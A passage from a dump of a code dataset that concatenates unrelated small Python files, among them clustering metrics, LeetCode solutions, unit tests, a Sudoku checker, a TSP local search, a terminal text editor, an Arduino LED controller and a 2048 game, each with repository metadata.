arr[to - 1][fr - 1] = 1
# N = 100
# arr = numpy.array([[0, 1, 0, 1, 1],
# [1, 0, 0, 0, 1],
# [0, 0, 0, 1, 1],
# [1, 0, 1, 0, 0],
# [1, 1, 1, 0, 0]])
A = numpy.zeros((N, N))
sum_all = [sum(arr[i]) for i in range(N)]
for i in range(N):
for j in range(N):
if arr[i][j] == 1:
A[i][j] = 1 / sum_all[j]
else:
A[i][j] = 0
e = numpy.zeros((N, N))
p = numpy.zeros((N, N))
for i in range(N):
for j in range(N):
if arr[i][j] == 1:
e[i][j] = 1 / sum_all[i]
else:
e[i][j] = 0
itr = 10
convergence = 10e-5
tmp = 100
print("start")
while tmp > convergence:
print("iter start")
p_now = (1 - alpha) * numpy.dot(A, p) + alpha * e
print("iter fin")
tmp = sum(sum((p_now - p)**2))
p = p_now
print(str(tmp))
p.dump("parr")
points = kmeans(2).fit(p)
# compute purity
labels = {}
with open("Labels.txt") as f:
line = " "
while len(line) > 0:
line = f.readline()
if len(line) == 0:
break
point = int(line.split(" ")[0])
label = int(line.split(" ")[1])
labels[point] = label
class_0 = {"Clinton": 0, "Trump": 0}
class_1 = {"Clinton": 0, "Trump": 0}
total = 0
for idx, p in enumerate(points.labels_):
total += 1
if idx not in labels:
continue
if p == 0:
if labels[idx] == 0:
class_0["Clinton"] += 1
else:
class_0["Trump"] += 1
else:
if labels[idx] == 0:
class_1["Clinton"] += 1
else:
class_1["Trump"] += 1
if class_0["Clinton"] > class_0["Trump"]:
class_0_label = "Clinton"
else:
class_0_label = "Trump"
if class_1["Clinton"] > class_1["Trump"]:
class_1_label = "Clinton"
else:
class_1_label = "Trump"
purity = (class_0[class_0_label] + class_1[class_1_label]) / total
# compute entropy
class_0_total = 0
for k, v in class_0.items():
class_0_total += v
class_1_total = 0
for k, v in class_1.items():
class_1_total += v
entropy = log_e(class_0_total, total) + log_e(class_1_total, total)
# compute NMI
clinton = class_0["Clinton"] + class_1["Clinton"]
trump = class_0["Trump"] + class_1["Trump"]
HC = log_e(clinton, total) + log_e(trump, total)
ioc = log_ce(class_0["Trump"], class_0_total, trump, total) \
+ log_ce(class_0["Clinton"], class_0_total, clinton, total) \
+ log_ce(class_1["Trump"], class_1_total, trump, total) \
+ log_ce(class_1["Clinton"], class_1_total, clinton, total)
NMI = ioc / ((entropy + HC) / 2)
print("purity " + str(purity))
print("entropy " + str(entropy))
print("nmi " + str(NMI))
| true |
10113a3f5a093941ab8d3c3b7a1e788390ed42c3 | Python | karthik-dasari/Python-programs | /Program to Convert Kilometers to Miles.py | UTF-8 | 166 | 4.34375 | 4 | [] | no_license | #Python Program to Convert Kilometers to Miles
kilometers = float(input("Enter value in kilometers: "))
fac=0.621371
Miles=kilometers*fac
print("in miles=",Miles) | true |
266dee29465c16d4e6ba56d52efb311d3d016265 | Python | Codaone/python-bitshares | /tests/test_txbuffers.py | UTF-8 | 3,179 | 2.546875 | 3 | [
"MIT"
] | permissive | import unittest
from bitsharesbase import operations
from .fixtures import fixture_data, bitshares
class Testcases(unittest.TestCase):
def setUp(self):
fixture_data()
def test_add_one_proposal_one_op(self):
tx1 = bitshares.new_tx()
proposal1 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 0, "asset_id": "1.3.0"},
"prefix": "TEST"
})
proposal1.appendOps(op)
tx = tx1.json()
self.assertEqual(tx["operations"][0][0], 22)
self.assertEqual(len(tx["operations"]), 1)
ps = tx["operations"][0][1]
self.assertEqual(len(ps["proposed_ops"]), 1)
self.assertEqual(ps["proposed_ops"][0]["op"][0], 0)
def test_add_one_proposal_two_ops(self):
tx1 = bitshares.new_tx()
proposal1 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 0, "asset_id": "1.3.0"},
"prefix": "TEST"
})
proposal1.appendOps(op)
proposal1.appendOps(op)
tx = tx1.json()
self.assertEqual(tx["operations"][0][0], 22)
self.assertEqual(len(tx["operations"]), 1)
ps = tx["operations"][0][1]
self.assertEqual(len(ps["proposed_ops"]), 2)
self.assertEqual(ps["proposed_ops"][0]["op"][0], 0)
self.assertEqual(ps["proposed_ops"][1]["op"][0], 0)
def test_have_two_proposals(self):
tx1 = bitshares.new_tx()
# Proposal 1
proposal1 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 0, "asset_id": "1.3.0"},
"prefix": "TEST"
})
for i in range(0, 3):
proposal1.appendOps(op)
# Proposal 1
proposal2 = bitshares.new_proposal(tx1, proposer="init0")
op = operations.Transfer(**{
"fee": {"amount": 0, "asset_id": "1.3.0"},
"from": "1.2.0",
"to": "1.2.0",
"amount": {"amount": 5555555, "asset_id": "1.3.0"},
"prefix": "TEST"
})
for i in range(0, 2):
proposal2.appendOps(op)
tx = tx1.json()
self.assertEqual(len(tx["operations"]), 2) # 2 proposals
# Test proposal 1
prop = tx["operations"][0]
self.assertEqual(prop[0], 22)
ps = prop[1]
self.assertEqual(len(ps["proposed_ops"]), 3)
for i in range(0, 3):
self.assertEqual(ps["proposed_ops"][i]["op"][0], 0)
# Test proposal 2
prop = tx["operations"][1]
self.assertEqual(prop[0], 22)
ps = prop[1]
self.assertEqual(len(ps["proposed_ops"]), 2)
for i in range(0, 2):
self.assertEqual(ps["proposed_ops"][i]["op"][0], 0)
| true |
9711c5409e0e067496c738588a22609771b1de5a | Python | muhilvarnan/flask-serverless | /tests/test_modules/test_service_now.py | UTF-8 | 521 | 2.640625 | 3 | [] | no_license | """
Unit test for service now
"""
import unittest
import mock
from modules import service_now
from mock_data import books
@mock.patch('modules.service_now.requests.get')
class ServiceNowTest(unittest.TestCase):
def test_get_books(self, mock_get):
"""
should return get books
"""
mock_get.return_value.ok = True
mock_get.return_value.json.return_value = books
obj = service_now.Adapater("https://www.booknomads.com")
self.assertEqual(obj.get_books(), books)
| true |
1d72eae046be42cb6aca45b7cb3a6a7d879f2eb1 | Python | wyaadarsh/LeetCode-Solutions | /Python3/1091-Shortest-Path-in-Binary-Matrix/soln-1.py | UTF-8 | 982 | 2.828125 | 3 | [
"MIT"
] | permissive | class Solution:
def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:
if grid[0][0] == 1:
return -1
def neighbor8(i, j):
n = len(grid)
for di in (-1, 0, 1):
for dj in (-1, 0, 1):
if di == dj == 0:
continue
newi, newj = i + di, j + dj
if 0 <= newi < n and 0 <= newj < n and grid[newi][newj] == 0:
yield (newi, newj)
n = len(grid)
ds = [[math.inf] * n for _ in range(n)]
queue = collections.deque([(0, 0)])
ds[0][0] = 1
while queue:
i, j = queue.popleft()
if i == j == n - 1:
return ds[n - 1][n - 1]
for newi, newj in neighbor8(i, j):
if ds[i][j] + 1 < ds[newi][newj]:
ds[newi][newj] = ds[i][j] + 1
queue.append((newi, newj))
return -1
| true |
089d2dbbdaf60ae4a62fd9ea347b5d2eac1d1d48 | Python | AkiLotus/AkikazeCP | /Vault/Codeforces Gyms-VPs/2017-2018 ACM-ICPC Pacific Northwest Regional Contest (Div. 1)/J.py | UTF-8 | 1,602 | 3.015625 | 3 | [] | no_license | import sys
m, n = map(int, sys.stdin.readline().split())
minimumInCol = []
maximumInCol = []
minimumInRow = []
maximumInRow = []
invalid = False
for i in range(0, m):
minimumInCol.append(m)
maximumInCol.append(-1)
minimumInRow.append(n)
maximumInRow.append(-1)
board = []
for i in range(0, m):
input = list(sys.stdin.readline())
input.pop()
for j in range(0, n):
if invalid:
break
if input[j] == 'R':
for i_ in range(i, m):
if maximumInRow[i_] == -1:
maximumInRow[i_] = j
for j_ in range(j, n):
if maximumInCol[j_] == -1:
maximumInCol[j_] = i
elif input[j] == 'B':
for i_ in range(0, i+1):
if maximumInRow[i_] <= j and maximumInRow[i_] != -1:
print "invalid at:"
print i,j
print "invalid caused by i = ", i_
invalid = True
break
else:
minimumInRow[i_] = j
for j_ in range(0, j+1):
if maximumInCol[j_] <= i and maximumInCol[j_] != -1:
print "invalid at:"
print i,j
print "invalid caused by j = ", j_
invalid = True
break
else:
minimumInCol[j_] = i
board.append(input)
if invalid:
print 0
else:
print minimumInRow
print maximumInRow
print minimumInCol
print maximumInCol
print board | true |
1a0eb9924f4404ca06f9a3b792cc077596000129 | Python | sixfwa/computational-intelligence-cw | /lab-sign-off/python_code/algorithms.py | UTF-8 | 2,585 | 3.53125 | 4 | [] | no_license | import time
import random
from utils import shortest_tour, swap_elements, sorted_tours
# Parameters CompleteGraph and time limit
def random_search(graph, limit):
number_of_tours = graph.number_of_tours()
tours = {}
start = time.time()
finish = start + limit
while start < finish:
# {tour (tuple): cost (float)}
tour = graph.random_tour()
cost = graph.get_tour_cost(tour)
if not tour in tours:
tours[tour] = cost
start = time.time()
shortest = shortest_tour(tours)
return shortest
# Takes a tour as input and returns the 2-opt neighbourhood of
# the tour as output
def two_opt_neighbourhood(tour):
switched_tours = []
for i in range(len(tour)):
for j in range(len(tour)):
switched = swap_elements(tour, i, j)
if not switched in switched_tours and switched != tour and not switched[::-1] in switched_tours:
switched_tours.append(switched)
return switched_tours
# Best Neighbour Step Function
# Takes a neighbourhood (with the same structure as that returned by the two opt function)
# and returns the shortest tour in the neighbourhood
def best_neighbourhood(graph, tour):
neighbourhood_tours = two_opt_neighbourhood(tour)
cost_dictionary = {}
for neighbourhood_tour in neighbourhood_tours:
cost_dictionary[neighbourhood_tour] = graph.get_tour_cost(
neighbourhood_tour)
shortest = shortest_tour(cost_dictionary)
return shortest
# Combining the above algorithm's.
# After generating a random tour it should repeatedly try to make
# the best local improving move. When a local optimum is reached,
# it should generate a new random solution and start the local
# search procedure from there. This process should continue until
# the set timer limit expires.
# After generating a random tour it should repeatedly try to make
# the best local improving move
def local_search(graph, limit):
best_tour = graph.random_tour()
best_cost = graph.get_tour_cost(best_tour)
best_tours = {}
start = time.time()
finish = start + limit
while start < finish:
new_tour = best_neighbourhood(graph, best_tour)[0]
new_cost = graph.get_tour_cost(new_tour)
if new_cost < best_cost:
best_tour = new_tour
best_cost = new_cost
best_tours[best_tour] = best_cost
else:
best_tour = graph.random_tour()
best_cost = graph.get_tour_cost(best_tour)
start = time.time()
return shortest_tour(best_tours)
| true |
d71c5d068d9be02152dfa5554dacfcd5609c5337 | Python | atturaioe/digital-image-correlation | /correlation.py | UTF-8 | 2,115 | 3.015625 | 3 | [] | no_license | import numpy as np
from PIL import Image
import argparse
def standardize(arr):
"""Apply stadardization to the given array"""
standardized = arr - np.mean(arr)
standardized /= np.linalg.norm(standardized) # L2 norm
return standardized
def rescale(arr):
"""Min-max normalization. Rescale given array to values in range [0, 1]"""
return (arr - arr.min()) / (arr.max() - arr.min())
def pad(temp_size):
"""Return the padding sizes relative to tem_size"""
padding = (temp_size - 1) / 2
if padding % 2 == 0:
return int(padding), int(padding)
else:
return int(np.ceil(padding)), int(np.floor(padding))
def correlation2D(image, template):
# TODO make rotated and scaled template sliding
assert image.shape > template.shape, 'Template is bigger than image'
img_h, img_w = image.shape
temp_h, temp_w = template.shape
temp = standardize(template)
result = np.zeros(image.shape)
pad_h, pad_w = pad(temp_h), pad(temp_w)
image = np.pad(image, (pad_h, pad_w))
for i in range(img_h):
for j in range(img_w):
left, right, top, bottom = j, j+temp_w, i, i+temp_h
patch = image[top:bottom, left:right]
assert patch.shape == temp.shape, 'Patch and and template should be the same size'
patch = standardize(patch)
result[i, j] = np.sum(np.multiply(patch, temp))
return result
def parse_args():
parser = argparse.ArgumentParser(description='2D grayscale cross-correlation')
parser.add_argument('--image', type=str, required=True)
parser.add_argument('--template', type=str, required=True)
args = parser.parse_args()
return args
def main():
args = parse_args()
image = Image.open(args.image).convert('L')
template = Image.open(args.template).convert('L')
image = np.copy(np.asarray(image))
template = np.copy(np.asarray(template))
corr = correlation2D(image, template)
output = Image.fromarray(np.uint8(rescale(corr) * 255))
output.save('correlated.png', 'PNG')
if __name__ == '__main__':
main()
| true |
0b071b48624b033bc94b648093af08bbdfa325f2 | Python | deepbaksu/DFAB-Trello-automation | /card_archiver.py | UTF-8 | 1,440 | 2.671875 | 3 | [] | no_license | import re
from datetime import date
from common import utils
class DoneCardsArchiver:
def __init__(self, team_info, today):
self.team_info = team_info
self.today = today
self._check_valid_init_input()
def archive_done_cards(self, resource_service, list_name, board_date):
board_id = resource_service.get_board_id(self.team_info['organ_name'],
utils.make_target_board_name(self.team_info['start_ym'], board_date))
archived_list_id = resource_service.create_archived_list(board_id,
utils.make_archived_list_name(self.today))
done_list_id = resource_service.get_list_id(board_id, list_name)
resource_service.move_done_cards(board_id, done_list_id, archived_list_id)
def _check_valid_init_input(self):
if not self.team_info or not self.today:
raise ValueError('There are no initial input values')
if 'start_ym' not in self.team_info or 'organ_name' not in self.team_info:
raise ValueError('Wrong team information(start_ym or organ_name do not exist)')
if not isinstance(self.today, date):
raise TypeError('Wrong date format of today(datetime.date)')
if not bool(re.search(r'^\d{4}-\d{2}$', self.team_info['start_ym'])):
raise ValueError('Wrong team start_ym format(yyyy-mm)')
| true |
1bfd3d973ec3a5c9385ee9f1f7093530b5ef72d8 | Python | S1lenix/PythonLabs | /Python3/tempCodeRunnerFile.py | UTF-8 | 211 | 2.515625 | 3 | [] | no_license | def tochkanapryamoy():
k,b = map(float, input().split('x'))
x,y = map(float, input().split(';'))
if k*x+b==y:
print(True)
else:
print(False)
tochkanapryamoy()
| true |
7b8d1f3eac79a5508d8fe825847b601f0a03afec | Python | JumboSoftware/PYGO | /PYGO/src/app.py | UTF-8 | 3,463 | 3.421875 | 3 | [] | no_license | import random
import os
# welcome to pygo's source code
startup_message = """
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Pygo V1
Made by Jumbo
Owned by Jumbo
Welcome to Pygo, a Text Editor.
If you are new, please execute 'help' to get started.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
help_ = """
~~ IN TERMINAL
help - Returns List of Available Commands
pygo.start - Enter the Editor
pygo.end - Exit Pygo
~~ IN EDITOR:
pygo.exit - Exit the Edtor
pygo.save - Save the File
"""
# for terminal
terminal_name = 'v1.pygo@terminal:~$ '
modeList = """
r - Read File
A new file will be generated if the file does not already exist.
a - Append Data to File
A new file will be generated if the file does not already exist.
x - Create New File
If the file already exists, the creation process will fail.
"""
# terminal
def PygoTerminal():
global cmd_format
cmd_format = f"{terminal_name}"
print(startup_message)
while True:
cmd = input(cmd_format)
if cmd == 'help':
print(help_)
continue
# open editor
elif cmd == 'pygo.start':
PygoEditor()
break
# end session
elif cmd == 'pygo.end':
break
# just something random dont worry about it
elif cmd == '' or ' ':
continue
elif cmd == ' ' or ' ':
continue
else:
print('\nInvalid Command. Please use \'help\' if you are lost.\n')
continue
# editor
def PygoEditor(*pygo_extensions):
# for extensions
extensions = [pygo_extensions]
# select file
while True:
global path
path = input('\nENTER FILE PATH OR USE A FILE NAME FOR A LOCAL FILE OR EXECUTE \'cancel\' TO RETURN TO THE TERMINAL: ')
if path == 'cancel':
PygoTerminal()
break
elif len(path) == 0:
print('\nNo File Chosen.')
PygoTerminal()
break
else:
# choose mode
print(modeList)
global mode
while True:
mode = input('\nSELECT MODE OR EXECUTE \'cancel\' TO RETURN TO THE TERMINAL: ')
if mode == 'cancel':
PygoTerminal()
break
else:
# for invalid files
if '.' not in path:
print('\nFile must have an extension.')
# return to terminal, this will be used some more
PygoTerminal()
else:
file = open(f"{path}", f"{mode}")
# this will hold the text
global per_line
per_line = '~ '
global data
data = ""
# mode checking
if mode == 'r':
print(file.read())
PygoTerminal()
elif mode == 'a':
while True:
global text
text = input(f'{per_line}' + ' ')
# text and data are seperate variables so that every time the user enters a line of code, the text is added to the data variable along with a newline escape, otherwise, all of the text entered would be gathered into one line
data += (text + '\n')
# save file and return to terminal
if text == 'pygo.save':
file.write(data)
PygoTerminal()
break
elif text == 'pygo.exit':
file.write(data)
PygoTerminal()
break
# create new file
elif mode == 'x':
new_file_name = input('\nCREATE NEW FILE: ')
new_file = open(f"{new_file_name}", 'x')
print()
PygoTerminal()
break
else:
print('\nInvalid Mode Choice.\n')
PygoTerminal()
break
PygoTerminal()
break
PygoTerminal()
break
PygoTerminal()
# nothing else here
| true |
a012171140b5572067cce232499f2f175c9b4d91 | Python | keiraaaaa/Leetcode | /Jun_14.py | UTF-8 | 2,433 | 3.59375 | 4 | [
"MIT"
] | permissive | '''
############################
# 142. Linked List Cycle II
############################
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def detectCycle(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head or not head.next:
return None
slow, fast = head, head
while fast.next!=None and fast.next.next!=None:
slow = slow.next
fast = fast.next.next
if fast == slow:
cycle = True
break;
if fast.next==None or fast.next.next==None:
return None
else:
# return True
slow_new = head
while slow_new != slow:
slow_new = slow_new.next
slow = slow.next
return slow
x = []
x = ListNode(1)
# x.next = ListNode(2)
# x.next.next = ListNode(3)
# x.next.next.next = x.next
solu = Solution()
# print (x.next.next.next.val)
print (solu.detectCycle(x))
'''
###################
# 148. Sort List
###################
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def merge(self, l1, l2):
merged = ListNode(0)
tail = merged
while l1!=None and l2!=None:
if l1.val>l2.val:
tail.next = l2
l2 = l2.next
else:
tail.next = l1
l1 = l1.next
tail = tail.next
if l1==None:
tail.next = l2
if l2==None:
tail.next = l1
return merged.next
def sortList(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head==None or head.next==None:
return head
slow, fast = head, head
while slow.next != None and fast.next != None and fast.next.next != None:
slow = slow.next
fast = fast.next.next
prev = slow.next
slow.next = None
# print (head.val, prev.val)
return self.merge(self.sortList(head), self.sortList(prev))
x = ListNode(4)
x.next = ListNode(2)
x.next.next = ListNode(1)
x.next.next.next = ListNode(3)
solu = Solution()
s = solu.sortList(x)
print (s.val)
| true |
15135129dc3bcc05393d137bab65b84e2bc25000 | Python | mattkim8/CSI | /sudoku.py | UTF-8 | 6,178 | 3.78125 | 4 | [] | no_license | # Problem Set 8
# Name: Kim, Matthew
# Collaborators: last name1, first name1; last name2, first name2; etc.
# Description: A solver for the Sudoku puzzle
import sys
def grid_display(board):
"""Display the board as a nice grid on the screen."""
for j in range(9):
for k in range(9):
print board[j][k],
if k%3 == 2:
print '\t',
print
if j%3 == 2:
print
return None
def set_board(list_of_lines):
"""Set the board based on the list of lines read from the input file."""
board = () # Empty tuple
for line in list_of_lines:
current_row = ()
number_list = line.rstrip().split()
for num in number_list:
current_row += (int(num), )
board += (current_row, )
return board
def load_file(filename):
try:
# Open the selected file in read mode.
file_object = open(filename, 'r')
except IOError as err_msg:
print "Couldn't open the file!", err_msg
sys.exit()
else:
# Use the lines in the file to create the board.
lines = file_object.readlines()
board = set_board(lines)
return board
finally:
file_object.close()
##############################################################################
# Complete the following functions
##############################################################################
def is_safe(board, row, column, x):
if column_check(board,column) and row_check(board,row) and cluster_check(board,row,column):
return True
else:
#print 'is_safe True'
return False
def column_check(board, column):
"""Check the board at the given column index to verify if
that column has a valid set of numbers.
"""
lol = []
new_board = board[:]
for i in new_board:
for j in i:
if list(i).index(j) == column-1:
lol.append(j)
for x in range(1,10):
if lol.count(x) >1:
return False
return True
def row_check(board, row):
"""Check the board at the given row index to verify if that
row has a valid set of numbers.
"""
lol = []
for i in range(9):
if row-1 == i:
for j in board[row-1]:
lol.append(j)
for x in range(1,10):
if lol.count(x) > 1:
return False
else:
return True
def cluster_check(board, row, column):
"""Check the cluster at the given column and row indices to
verify if that cluster has a valid set of numbers.
"""
lol = []
if row >= 1 and row <=3:
row_stick = (board[0:3])
elif row >= 4 and row <= 6:
row_stick = (board[3:6])
elif row>=7 and row<=9:
row_stick = (board[6:])
if column>= 1 and column <=3:
row_block = (row_stick[0][0:3])+(row_stick[1][0:3])+(row_stick[2][0:3])
elif column >=4 and column <=6:
row_block = (row_stick[0][3:6])+(row_stick[1][3:6])+(row_stick[2][3:6])
elif column >=7 and column <=9:
row_block = (row_stick[0][6:])+(row_stick[1][6:])+(row_stick[2][6:])
for i in row_block:
lol.append(i)
for x in range(1,10):
if lol.count(x) > 1:
return False
else:
return True
def place(board,row,column,x):
"""Update the given puzzle board.
Place digit x at the given row and column, and return
the new board.
"""
new_board = list(board)
new_board[row-1] = new_board[row-1][:column-1] + (x, ) + new_board[row-1][column:]
newer_board = tuple(new_board)
return newer_board
def first_empty(board):
"""Return a tuple (row, col) which represents the row and
column of an empty cell (one that has the value zero). If no
such cell exists (which means the puzzle is solved), return
None.
"""
for x in list(board):
for i in list(x):
if i == 0:
return (list(board).index(x)+1,list(x).index(i)+1)
return None
def sudoku_solve(board):
"""Call this function to solve the Sudoku board.
It should call the recursive function solve_helper.
"""
if first_empty(board) == None:
return board
solution = solve_helper(board, 1, 1)
return solution
def solve_helper(board, row, col):
if first_empty(board) == None:
return board
for x in range (1, len(board)+1):
if is_safe(board, row, col, x):
new_board = place(board,row,col,x)
empty_cell = first_empty(new_board)
if first_empty(new_board) == None:
solution = new_board
return solution
solution = solve_helper(new_board,empty_cell[0],empty_cell[1])
if solution != None:
return solution
return None
######__main__
#### Test 1: Please do not change the following four lines. If you're getting
# an error here, it means one of the following functions is not working
# properly: row_check, column_check, cluster_check
new_board = place(load_file('easy.txt'), 1, 1, 1)
assert row_check(new_board, 1), 'Row check failed!'
assert column_check(new_board, 1), 'Column check failed!'
assert cluster_check(new_board, 1, 1), 'Cluster check failed!'
#### Test 2: Please do not change the following four lines. If you're getting
# an error here, it means one of the following functions is not working
# properly: row_check, column_check, cluster_check
new_board = place(load_file('easy.txt'), 3, 7, 3)
assert not row_check(new_board, 3), 'Row check failed!'
assert column_check(new_board, 7), 'Column check failed!'
assert not cluster_check(new_board, 3, 7), 'Cluster check failed!'
### Update the file name below accordingly.
### Choices: 'easy.txt' 'moderate.txt' 'hard.txt'
board = load_file('easy.txt')
# The function call to solve the Sudoku puzzle.
solution = sudoku_solve(board)
# The function call to display the solution board.
grid_display(solution)
| true |
5b5b850f1a511916b0a528cc5c0b6e07f55aa217 | Python | swanhack/lightbot | /py/FresherUno.py | UTF-8 | 3,397 | 2.78125 | 3 | [] | no_license | import serial
import time
from time import sleep
import threading
import asyncio
# Serial signals
SSIG_DISCORD_JOIN = 1
SSIG_SET_DEFAULT_COLOUR = 2
SSIG_QUERY_STATE = 3
# Colour Macros
SWAN_HACK_GREEN = (0x00, 0xFF, 0x02)
class FresherUno:
def __init__(self, serPort, serSpeed):
self.serialCon = serial.Serial(serPort, serSpeed, timeout=15, write_timeout=15)
# Wait for serial to initialise
sleep(3)
self.lock = threading.Lock()
self.defaultColour = SWAN_HACK_GREEN
self.__sendSetDefaultColour(self.defaultColour[0],
self.defaultColour[1],
self.defaultColour[2])
def discordBlink(self, times, accentColour):
self.__sendDiscordBlink(accentColour[0], accentColour[1], accentColour[2], times)
def setDefaultColour(self, colour):
self.defaultColour = colour
self.__sendSetDefaultColour(colour[0], colour[1], colour[2])
async def setTemporaryColour(self, colour, totalSec = 30):
self.__sendSetDefaultColour(colour[0], colour[1], colour[2])
# Run the wait asynchronously
loop = asyncio.get_running_loop()
out = loop.run_in_executor(None, self.__waitAndResetDefaultColour, totalSec)
def queryCurrentColour(self):
self.lock.acquire()
self.serialCon.write(bytearray([SSIG_QUERY_STATE]))
RGB_BYTE_SIZE = 3
currentStateBytes = self.serialCon.read(RGB_BYTE_SIZE)
self.lock.release()
if not len(currentStateBytes) == RGB_BYTE_SIZE:
raise RuntimeError("didn't read full rgb state string from arduino")
currentState = (currentStateBytes[0], currentStateBytes[1],
currentStateBytes[2])
return currentState
def __waitAndResetDefaultColour(self, timeout):
knownTimeWhenDefaultChangedLast = self.__timeDefaultChangedLast
sleep(timeout)
if self.__timeDefaultChangedLast == knownTimeWhenDefaultChangedLast:
self.__sendSetDefaultColour(self.defaultColour[0],
self.defaultColour[1],
self.defaultColour[2])
def __sendDiscordBlink(self, accentR, accentG, accentB, times):
self.lock.acquire()
self.serialCon.write(bytearray([SSIG_DISCORD_JOIN,
accentR,
accentG,
accentB,
times]))
self.lock.release()
def __sendSetDefaultColour(self, r, g, b):
self.lock.acquire()
self.__timeDefaultChangedLast = int(time.time())
self.serialCon.write(bytearray([SSIG_SET_DEFAULT_COLOUR,
r,
g,
b]))
self.lock.release()
| true |
ba10df750bbe383166524715c6cbf7448bfd1d70 | Python | ShubhamWaghilkar/python | /healthy programmer.py | UTF-8 | 2,682 | 3.125 | 3 | [] | no_license | import pygame
import time
import datetime
from pygame import mixer
current_time = time.strftime("%H:%M:%S")
work_start_time = '09:00:00'
work_end_time = '24:00:00'
water_limit = 200
glass_size = 5
no_of_glass = round(water_limit/glass_size)
total_work = 60 #8hours
water_interval = (total_work/no_of_glass)
eye_count =0
pys = 0
eye_interval = 60 ##30minutes
phy_interval = 60 ##45minutes
def playsong():
mixer.init()
mixer.music.load("wa.mp3")
print("loaded")
mixer.music.play()
mixer.music.set_volume(1.0)
print("music playing")
#
# user = input("Pleae select yes an no to start the program")
# user = user.lower()
# if user =="yes":
# while current_time > work_start_time and current_time < work_end_time:
# if water_count == 28 and water_count == 60:
# playsong()
# wat= input("to stop remainder hit 'drank'")
# wat = wat.lower()
# if wat == "drank":
# mixer.music.stop()
# f = open("water.txt","a")
# f.write(f"logged {datetime.datetime.now()} drank water")
# print("Music stop")
# break
#
def wr(file,text):
f = open(file,"a")
f.write(f"[ " + str(datetime.datetime.now()) + "] : "+ text)
f.close()
def water(glass):
i = ""
while(i is not 'drank'):
playsong()
print("\n", end="")
i = input("did you drank water type yes if drank").lower()
if i == "drank":
wr('water.text','Dranked')
mixer.music.stop()
time.sleep(water_interval)
break
def eye():
i = ""
while(i is not "done"):
playsong()
print("\n", end="")
i = input("have taken break from the screen").lower()
if i == "done":
wr('eye.txt', 'eyeBreak Taken')
mixer.music.stop()
time.sleep(eye_interval)
break
def phy():
i = ""
while(i is not "ex"):
playsong()
print("\n ", end="")
i = input("Have you done the exercise").lower()
if i == "ex":
wr('phy.txt','exercise Done')
mixer.music.stop()
time.sleep(phy_interval)
break
try:
glass = 0
while(current_time is not work_end_time):
if current_time>=work_start_time and current_time<= work_end_time:
if glass == no_of_glass:
pass
else:
water(glass)
glass +=1
eye()
phy()
current_time = time.strftime("%H:%M:%S")
print(glass)
except Exception as e:
print("something wrong")
| true |
ee628766088e2ce2e811630d9812b75076d0f23a | Python | vishnupsatish/CCC-practice | /2018/J5/J5_not_correct.py | UTF-8 | 1,622 | 2.859375 | 3 | [] | no_license | def minus1(num):
return num - 1
pages = int(input())
temp_pages_reachable = [list(map(minus1, list(map(int, input().split())))) for _ in range(pages)]
pages_reachable = []
end_pages = []
visited = dict()
for page in range(len(temp_pages_reachable)):
if temp_pages_reachable[page][0] == -1:
end_pages.append(page)
pages_reachable.append(list(set(temp_pages_reachable[page])))
visited[page] = []
del temp_pages_reachable
visited[-1] = []
shortest_step = 10000000000000000000
def main(page_no, steps=0):
global shortest_step
if page_no == -1 and steps < shortest_step:
shortest_step = steps
for reachable in pages_reachable[page_no]:
if reachable in visited[page_no]:
continue
visited[page_no].append(reachable)
main(reachable, steps=steps+1)
steps -= 1
main(0)
for key in visited:
if len(visited[key]) == 0:
print("N")
break
else:
print("Y")
print(shortest_step)
#-------------------------------------------------------------------------------------------------
# Wrong answer below
# def bfs():
# visited_ = dict()
# q = [0]
# visited_[0] = True
# for page in range(pages):
# visited_[page] = False
# visited_[-1] = False
# level = 0
# ans = 238929843743738
# while q:
#
# now = pages_reachable[q.pop(0)]
#
# for v in now:
# if not visited_[v]:
# visited_[v] = True
# q.append(v)
# # print(v + 1, level, end="\n")
# if v == -1:
# return len(q)
# level -= 1
# level += 1
# def bfs(nodes, level):
# level += 1
# for node in nodes:
# node_ = pages_reachable[node]
# if -1 in node_:
# return level
# return bfs(node_, level) | true |
2eb6b8ec9c7e9a8463baa5a57c84aaa4e8978a50 | Python | LawrenceGao0224/LeetCode | /two_sum.py | UTF-8 | 795 | 3.265625 | 3 | [] | no_license | from typing import List
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
sort_nums = sorted(nums)
l = 0
r = len(sort_nums)-1
while r > l:
summ = sort_nums[l] + sort_nums[r]
if summ > target:
r -= 1
elif summ < target:
l += 1
else:
break
# sort_nums[l],sort_nums[r]
res = []
for i in range(len(nums)):
if nums[i] == sort_nums[l] or nums[i] == sort_nums[r]:
res.append(i)
if len(res) == 2:
break
else:
continue
return(res)
number = [2,7,11,5]
target = 9
a = Solution()
print(a.twoSum(number,target))
| true |
68e5787e380035558cc12d269e64d57bd7e46052 | Python | PawaN-K-MishrA/2048_Game | /logic.py | UTF-8 | 3,572 | 3.453125 | 3 | [] | no_license | import random
#game starting function
def start_game():
mat=[[0 for j in range(4)] for i in range(4)]
return mat
#adding new 2 at random function
def add_new2(mat):
r=random.randint(0,3)
c=random.randint(0,3)
while mat[r][c]!=0:
r=random.randint(0,3)
c=random.randint(0,3)
mat[r][c]=2
return mat
#getting the current state of function
def get_curr_state_of_game(mat):
#if 2048 present you won
for i in range(4):
for j in range(4):
if mat[i][j]==2048:
return 'WON'
#if 0 is presnet then game not over.
for i in range(4):
for j in range(4):
if mat[i][j]==0:
return 'GAME NOT OVER.'
